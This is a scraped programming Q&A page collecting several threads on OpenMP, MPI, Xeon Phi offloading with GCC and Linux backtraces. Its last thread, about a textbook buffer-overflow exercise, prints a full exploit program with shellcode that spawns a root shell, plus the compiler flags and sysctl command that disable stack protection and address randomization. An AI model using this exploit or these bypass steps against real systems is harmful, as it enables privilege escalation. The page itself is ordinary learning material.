Why can't CIVL verify OpenMP programs in my desktop? - openmp

I installed CIVL in ubuntu 14.04 and want to use it to verify OpenMP programs, but I encountered some questions as following:
If I use the command 'civl verify file_name.c' to verify OpenMP, it just regard the OpenMP program as a common C program, because I missed a optional parameter '-ompNoSimplify'.
However, if I use the command 'civl verify -ompNoSimplify file_name.c', it cannot verify any OpenMP programs, even the very simple OpenMP programs. such as the following program
#include <stdio.h>
#include <omp.h>
int main()
{
#pragma omp parallel for
for (char i = 'a'; i <= 'z'; i++)
printf("%c\n",i);
return 0;
}
the output of verification

Related

Embaressingly parallel processing using Open MPI and OpenMP

It may be a silly question, anyway I am working on an embarrassingly parallel problem. I can divide the work into independent tasks (no communication) that can be performed in parallel.
In a shell script.sh one can use the following:
#!/bin/bash
let MY_ID=${OMPI_COMM_WORLD_RANK}
./a.out $MY_ID
In prog.c we have a simple independent program:
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char *argv[]){
int myid = atoi(argv[1]);
if(myid%2==0)
printf("\nI am %d and I am an even process\n", myid);
else
printf("\nI am %d and I am an odd process\n", myid);
return 0;
}
And finally, to execute the program with 12 different processors:
mpirun -np 12 script.sh
My question is that is it possible to do the same thing using OpenMP and perhaps environment variables like OMP_NUM_THREADS ?
There is no OpenMP environment variable which, when passed to a program in the way you indicate, will be given a value different for each invocation of the program. If you think about how OpenMP works you might think, as I do, that this doesn't make much sense - since the OpenMP program is implemented as a collection of threads. This is in marked contrast to the model of operations of MPI in which each process is a separate process, bolstered with a library for inter-process communications - in this case it makes sense that each process have a unique identifier for facilitating communication. When an OpenMP program executes communication between threads is effected by operations on shared memory locations, not by passing messages to specified threads.
In passing, you're not really writing an MPI program, just using one of the facilities its environment provides for making your shell-script writing a little easier. You could almost as easily write a shell-script to send a different id to each invocation of the program without the MPI environment - and you could do the same for invocations of an OpenMP program. Though why you would do either if your programs really are independent I don't know.
Too long to post it as a comment. Actually, this kind of parallel processing is useful for ensemble modeling. When your program runs for different initial condition, and each run creates different folder or output file.
I came up to this :
export OMP_NUM_THREADS=4
g++ prog.cpp -fopenmp
./a.out
in prog.cpp we have:
#include<stdio.h>
#include<stdlib.h>
#include<omp.h>
#include<string>
using std::string;
int main(){
int nthreads, tid;
string cmd;
#pragma omp parallel private(tid)
{
tid = omp_get_thread_num();
cmd = "echo 'this is a test. I am thread :' " + std::to_string(tid) ;
system(cmd.c_str()); //each thread can creat a folder and run a script
// system("./my_script.sh");
}
return 0;
}
with the output as follows:
this is a test. I am thread : 0
this is a test. I am thread : 3
this is a test. I am thread : 2
this is a test. I am thread : 1

How to use GCC 5.1 and OpenMP to offload work to Xeon Phi

Background
We have been trying unsuccessfully to use the new GCC 5.1 release to offload OpenMP blocks to the Intel MIC (i.e. the Xeon Phi). Following the GCC Offloading page, we've put together the build.sh script to build the "accel" target compiler for "intelmic" and the host compiler. The compilation appears to complete successfully.
Using the env.sh script we then attempt to compile the simple hello.c program listed below. However, this program seems to only run on the host and not the target device.
As we are new to offloading in general, as well as compiling GCC, there are multiple things we could be doing incorrectly. However, we've investigated the resources already mentioned plus the following (I do not have enough rep to post the links):
Offloading for Xeon Phi
Xeon Phi Tutorial
Intel Xeon Phi Offload Programming Models
The biggest problem is they usually reference the Intel compiler. While we plan to purchase a copy, we do NOT currently have a copy. In addition, the majority of our development pipeline is already integrated with GCC and we'd prefer to keep it that way (if possible).
We have installed the latest MPSS 3.5 distribution, making the necessary modifications to work under Ubuntu. We can successfully communicate and check the status of the Xeon Phis in our system.
In our efforts, we never saw any indication that the code was running in the mic emulation mode either.
Questions
Has anyone successfully built a host/target GCC compiler combination that actually offloads to the Xeon Phi? If so, what resources did you use?
Are we missing anything in the build script?
Is there anything wrong with the test source code? They compile with no errors (except what is mentioned below) and run with 48 threads (i.e. the number of logical threads in the host system).
Since Google search does not reveal much, does anyone have suggestions for the next step (besides giving up on GCC offloading)? Is this a bug?
Thanks!
build.sh
#!/usr/bin/env bash
set -e -x
unset LIBRARY_PATH
GCC_DIST=$PWD/gcc-5.1.0
# Modify these to control where the compilers are installed
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
TARGET_BUILD=/tmp/gcc-build-mic
HOST_BUILD=/tmp/gcc-build-host
# i dropped the emul since we are not planning to emulate!
TARGET=x86_64-intelmic-linux-gnu
# should this be a quad (i.e. pc)?? default (Ubuntu) build seems to be x86_64-linux-gnu
HOST=x86_64-pc-linux-gnu
# check for the GCC distribution
if [ ! -d $GCC_DIST ]; then
echo "gcc-5.1.0 distribution should be here $PWD"
exit 0
fi
#sudo apt-get install -y libmpfr-dev libgmp-dev libmpc-dev libisl-dev dejagnu autogen sysvbanner
# prepare and configure the target compiler
mkdir -p $TARGET_BUILD
pushd $TARGET_BUILD
$GCC_DIST/configure \
--prefix=$TARGET_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=target \
--disable-multilib \
--build=$TARGET \
--host=$TARGET \
--target=$TARGET \
--enable-as-accelerator-for=$HOST \
--program-prefix="${TARGET}-"
#--program-prefix="$HOST-accel-$TARGET-" \
# try adding the program prefix as HINTED in the https://gcc.gnu.org/wiki/Offloading
# do we need to specify a sysroot??? Wiki says we don't need one... but it also says "better to configure as cross compiler....
# build and install
make -j48 && make install
popd
# prepare and build the host compiler
mkdir -p $HOST_BUILD
pushd $HOST_BUILD
$GCC_DIST/configure \
--prefix=$HOST_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=host \
--disable-multilib \
--build=$HOST \
--host=$HOST \
--target=$HOST \
--enable-offload-targets=$TARGET=$TARGET_PREFIX
make -j48 && make install
popd
env.sh
#!/usr/bin/env bash
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
HOST=x86_64-pc-linux-gnu
VERSION=5.1.0
export LD_LIBRARY_PATH=/opt/intel/mic/coi/host-linux-release/lib:/opt/mpss/3.4.3/sysroots/k1om-mpss-linux/usr/lib64:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$HOST_PREFIX/lib:$HOST_PREFIX/lib64:$HOST_PREFIX/lib/gcc/$HOST/$VERSION:$LD_LIBRARY_PATH
export PATH=$HOST_PREFIX/bin:$PATH
hello.c (version 1)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma offload target (mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
We compiled this code with:
gcc -fopenmp -foffload=x86_64-intelmic-linux-gnu hello.c -o hello
hello_omp.c (version 2)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma omp target device(mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
Almost the same thing, but instead we tried the
#pragma omp target device
syntax. In fact, with mic, it complains, but with any device numbers (i.e. 0) it compiles and runs on the host. This code was compiled in the same manner.
Offloading to Xeon Phi with GCC 5 is possible. In order to get it to work, one must compile liboffloadmic for native MIC target, similarly to how it is done here. The problem of your setup is that it compiles host emulation libraries (libcoi_host.so, libcoi_device.so), and sticks with emulated offloading even though the physical Xeon Phi is present.

How to get backtrace without core file?

In case core-dump is not generated(due to any possible reason). And I want to know back trace (execution sequence of instructions). How Can I do that?
As /proc/pid/maps stores the memory map of a process.
Is there any file in linux which stores userspace or kernel space of a process?(May be I'm using wrong words to express)
I mean to say all address by address sequence of execution of instructions.
To see what the kernel stack for a process looks like at the present time:
sudo cat /proc/PID/stack
If you want to see the user stack for a process, and can get to it while it is still running (even if it is stuck waiting for a system call to return), run gdb and attach to it using its PID. Then use the backtrace command. This will be much more informative if the program was compiled with debug symbols.
If you want backtrace to be printed in Linux kernel use dump_stack()
If you want backtrace to be printed in user-level C code, implement something like this
#include <stdlib.h>
#include <stdio.h>
#include <execinfo.h>
#define BACKTRACE_SIZ 64
void show_backtrace (void)
{
void *array[BACKTRACE_SIZ];
size_t size, i;
char **strings;
size = backtrace(array, BACKTRACE_SIZ);
strings = backtrace_symbols(array, size);
for (i = 0; i < size; i++) {
printf("%p : %s\n", array[i], strings[i]);
}
free(strings); // malloced by backtrace_symbols
}
And then compile the code with -funwind-tables flag and link with -rdynamic
As told in http://www.stlinux.com/devel/debug/backtrace

OpenMP bug with Intel Compiler?

The following piece code
#pragma omp parallel
printf("%f", 1.0f);
produces the a "Floating point exception". Has anyone encountered anything like that?
More details:
No problems when I try to print out strings or integers.
No problem if OpenMP is not used.
I am running it on Mac OSX 10.6.8 and the Intel C++ compiler 12.0.4.
Other than that, OpenMP works fine.
The code:
#include <stdio.h>
#include <omp.h>
int main()
{
#pragma omp parallel
printf("%d", 1);
printf("\n...\n");
fflush(stdout);
#pragma omp parallel
printf("%f", 2.0);
}
compiled with:
icpc -o test test.cc -fp-trap-all=all -openmp
produces:
1111
...
Floating point exception

Disabling Stack Smashing Protection in Ubuntu 11.04

I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:
-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0 followed by a recompile, with no success.
It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures
I'm a bit more informed on what's going on now. The given code constructs a buffer and then passes it to a program called notesearch that has a buffer overflow vulnerability. I didn't figure out how to disable the protective measures on the current version of ubuntu, but the methods I tried do work on my Ubuntu 9.10 virtual machine. That is, -fno-stack-protector works as a gcc flag, and when paired with sysctl kernel.randomize_va_space=0, buffer overflows that execute shellcode on the stack are permitted. A bit of a workaround, but running my VM suits me well and allows me to continue through the examples in this book. It's a great book if you're interested in learning exploits. Here it is
Are you sure you're passing -fno-stack-protector to the right gcc invocation? The given code doesn't appear to have a buffer overflow.

Resources